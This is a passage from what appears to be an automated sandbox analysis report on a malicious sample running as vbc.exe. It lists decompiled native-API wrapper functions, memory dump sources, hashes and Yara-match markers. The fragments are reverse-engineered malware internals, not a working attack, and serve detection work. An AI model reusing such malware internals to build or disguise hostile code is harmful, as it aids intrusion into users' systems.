                                                                                        • Opcode Fuzzy Hash: bfecd78659e1554283f11a98a106c94ec172c3de3acfa593174347ddd409bb30
                                                                                        • Instruction Fuzzy Hash: 7C410870E0865A9FDB08CFEAC9815AEFBF2BF98310F24C46AC415A7254D3749A419F94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001E8200, Relevance: .1, Instructions: 110COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 73cf31811047c5d7a50b0c0808dc2d93b904cd9e64f58e4e7391a9b623014756
                                                                                        • Instruction ID: 4fd5571a7f8c5fd8f82e1aaa27e8d2759ff13bd6e1bacd5932a7fa8f398215d6
                                                                                        • Opcode Fuzzy Hash: 73cf31811047c5d7a50b0c0808dc2d93b904cd9e64f58e4e7391a9b623014756
                                                                                        • Instruction Fuzzy Hash: 1241FA70E05A4ADFCB48CFA6C5814AEFBB2BF89300F24C56AC519B7215D7349A41CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001E8210, Relevance: .1, Instructions: 108COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 978a0d0aa942059b0ad69a90e037035b9bc30afbebcd07a276c15cf5a28e25d5
                                                                                        • Instruction ID: 2dad338a1354886260ab3d87a91a5ced12dab19a38995b24d75d3bfcf198db6e
                                                                                        • Opcode Fuzzy Hash: 978a0d0aa942059b0ad69a90e037035b9bc30afbebcd07a276c15cf5a28e25d5
                                                                                        • Instruction Fuzzy Hash: 8941DA70E05A0ADFCB48CFDAC5815AEFBF2BB89300F24C569C519B7215D7349A41CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001E83E0, Relevance: .1, Instructions: 79COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 02d7fcaf75e650101981ce1d7f90c8c8f93c16895552632d280df1cd2a1be4f9
                                                                                        • Instruction ID: 42b2a41c65da9145a058c7c216a7e66bed6d8a12ac20c8def1ae8e434e21b5ea
                                                                                        • Opcode Fuzzy Hash: 02d7fcaf75e650101981ce1d7f90c8c8f93c16895552632d280df1cd2a1be4f9
                                                                                        • Instruction Fuzzy Hash: 9931EB75E056588FEB59CFABD85069EFBF3AFC9300F14C0BAC508AA265DB3019458F51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001EB5D0, Relevance: .1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 42793130b3be69eedf2227e7bc462319b7281955d8dc47a77287a84e3552f1af
                                                                                        • Instruction ID: 85efc288aaf3468d395951b0f48a757ec54e7819b7dba339051a860dee9d6ebf
                                                                                        • Opcode Fuzzy Hash: 42793130b3be69eedf2227e7bc462319b7281955d8dc47a77287a84e3552f1af
                                                                                        • Instruction Fuzzy Hash: 3A216A71E15668DBDB08CFAAD9806EEFBF3AFC9300F14C06AD508E7264DB305A558B51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001EAF40, Relevance: .1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2800fa67d754f9ae93827e7f4f49a623a050498dac2fff804be813efb41d8461
                                                                                        • Instruction ID: 42fa37ce5b3dab5d0af28b7cd77b0203e6e3f656dfc8be6e12b3dd46e6d4bc15
                                                                                        • Opcode Fuzzy Hash: 2800fa67d754f9ae93827e7f4f49a623a050498dac2fff804be813efb41d8461
                                                                                        • Instruction Fuzzy Hash: CF21F471E10619CBDB48CFABD94069EFBF7AFC8310F14C03AD508A7264EB345A458B61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001EAF31, Relevance: .1, Instructions: 58COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7cb10ce254da8b0fa25fd5748d8ba46449e3809170566b8509a0d99be148a553
                                                                                        • Instruction ID: d89e3d73a5e43879b78fd84e0c619cf57b5c14b4bf1a536b1adadac6e7ef4329
                                                                                        • Opcode Fuzzy Hash: 7cb10ce254da8b0fa25fd5748d8ba46449e3809170566b8509a0d99be148a553
                                                                                        • Instruction Fuzzy Hash: 7E211570E15659CBDB49CFABC85069EBBF3AFC9300F18C06AD408A7265EB344905CB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Analysis Process: vbc.exe PID: 2636 Parent PID: 2976 vbc.exeCOMMON

                                                                                        Executed Functions

                                                                                        Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 37%
                                                                                        			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                                        0x00418273
                                                                                        0x0041827f
                                                                                        0x00418287
                                                                                        0x00418292
                                                                                        0x004182ad
                                                                                        0x004182b5
                                                                                        0x004182b9

                                                                                        APIs
                                                                                        • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID: R=A$R=A
                                                                                        • API String ID: 2738559852-3742021989
                                                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                        • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                        • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00409B20(signed char __ebx, void* __edi, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t32;
				void* _t33;
				void* _t34;

				_v8 =  &_v536;
				_t15 = E0041AB50( &_v12, 0x104, _a8);
				_t33 = _t32 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF70(__eflags, _v8);
					_t34 = _t33 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1F0(__ebx, __edi,  &_v12, 0);
						_t34 = _t34 + 8;
					}
					_t18 = E00419300(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                        0x00409b3c
                                                                                        0x00409b3f
                                                                                        0x00409b44
                                                                                        0x00409b49
                                                                                        0x00409b53
                                                                                        0x00409b58
                                                                                        0x00409b5b
                                                                                        0x00409b5d
                                                                                        0x00409b65
                                                                                        0x00409b6a
                                                                                        0x00409b6a
                                                                                        0x00409b71
                                                                                        0x00409b79
                                                                                        0x00409b7c
                                                                                        0x00409b7e
                                                                                        0x00409b92
                                                                                        0x00000000
                                                                                        0x00409b94
                                                                                        0x00409b9a
                                                                                        0x00409b4e
                                                                                        0x00409b4e
                                                                                        0x00409b4e

                                                                                        APIs
                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0
                                                                                        • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                        • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                                        • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                        • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                        0x004181cf
                                                                                        0x004181d7
                                                                                        0x0041820d
                                                                                        0x00418211

                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                        • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                        • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041839A, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 79%
                                                                                        			E0041839A(void* __eax, void* __edi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t26;

				asm("outsd");
				_t22 = _a4;
				_t13 = _t22 + 0xc60; // 0xca0
				E00418DC0(__edi, _a4, _t13,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t26 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t26;
			}




                                                                                        0x0041839a
                                                                                        0x004183a3
                                                                                        0x004183af
                                                                                        0x004183b7
                                                                                        0x004183d9
                                                                                        0x004183dd

                                                                                        APIs
                                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2167126740-0
                                                                                        • Opcode ID: b5984446d98b9bf03da4996990798db852465c1102d8d850623e230ac0b519bc
                                                                                        • Instruction ID: 8791ccc4de8cc195fbb6da5249e7498e74b881bd086c7f9c79c92661f8669540
                                                                                        • Opcode Fuzzy Hash: b5984446d98b9bf03da4996990798db852465c1102d8d850623e230ac0b519bc
                                                                                        • Instruction Fuzzy Hash: F4F058B1200119AFCB14CF89DC81EEB77A9BF88314F048208FA0997240CA30E810CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                        0x004183af
                                                                                        0x004183b7
                                                                                        0x004183d9
                                                                                        0x004183dd

                                                                                        APIs
                                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2167126740-0
                                                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                        • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                        • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E004182F0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409743
				E00418DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                                        0x004182f3
                                                                                        0x004182f6
                                                                                        0x004182ff
                                                                                        0x00418307
                                                                                        0x00418315
                                                                                        0x00418319

                                                                                        APIs
                                                                                        • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                        • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                        • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A700C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                        • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                        • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                        • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A70078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                        • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                        • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                        • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A70048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                        • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                        • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                        • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A707AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                        • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                        • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                        • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A6F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                        • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                        • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                        • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A6F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                        • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                        • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                        • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A6FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                        • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                        • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                        • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A6FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
